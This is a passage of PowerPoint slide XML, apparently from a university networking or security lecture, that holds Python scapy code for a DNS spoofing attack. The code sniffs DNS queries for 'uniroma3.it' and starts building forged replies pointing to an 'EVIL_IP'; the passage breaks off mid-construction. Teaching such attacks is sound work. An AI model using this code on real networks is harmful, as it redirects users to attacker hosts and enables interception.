              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sendp</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>):</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == DNS_UNI_IP:        </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ether_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].sport)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
